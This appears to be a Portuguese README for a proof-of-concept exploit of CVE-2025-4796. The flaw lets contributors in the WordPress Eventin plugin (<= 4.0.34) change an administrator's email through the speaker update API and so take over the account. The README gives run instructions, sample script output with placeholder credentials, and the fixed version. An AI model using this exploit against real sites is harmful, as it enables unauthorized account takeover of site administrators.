
eventin <= 4.0.34 - escalada de privilégio via alteração de e-mail do usuário / tomada de conta para contribuidor autenticado+
eventin <= 4.0.34 - escalonamento de privilégios via alteração de e-mail de usuário / assunção de conta para contribuidor autenticado+
Bug de escalonamento de privilégios no plugin WordPress eventin (<= 4.0.34) que permite que qualquer contribuidor ou usuário de nível superior altere o e-mail de qualquer usuário através da API de atualização de palestrantes do plugin. Ao alterar o e-mail de um administrador para um controlado pelo atacante, eles podem redefinir a senha e assumir a conta.
eventin\speaker\api\speakercontroller::update_item)O eventin não verifica adequadamente quem está solicitando a atualização ou se tem permissão para alterar o e-mail do usuário. Um contribuidor ou superior pode chamar este endpoint:
requisitos:
instalar requests:
pip install requests
execute o script e insira os valores solicitados quando for perguntado:
python3 CVE-2025-4796.py
[+] turning off ssl verification warnings
[+] login into wordpress.
[+] login successful.
[+] fetching nonce token
[+] nonce token found: abcdef1234567890
[+] update request for speaker email
[+] update operation successful.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
A correção foi lançada na versão 4.0.35 do plugin eventin. Os administradores do site são fortemente aconselhados a atualizar para esta versão imediatamente. A correção inclui verificações adicionais de validação do usuário na função SpeakerController::update_item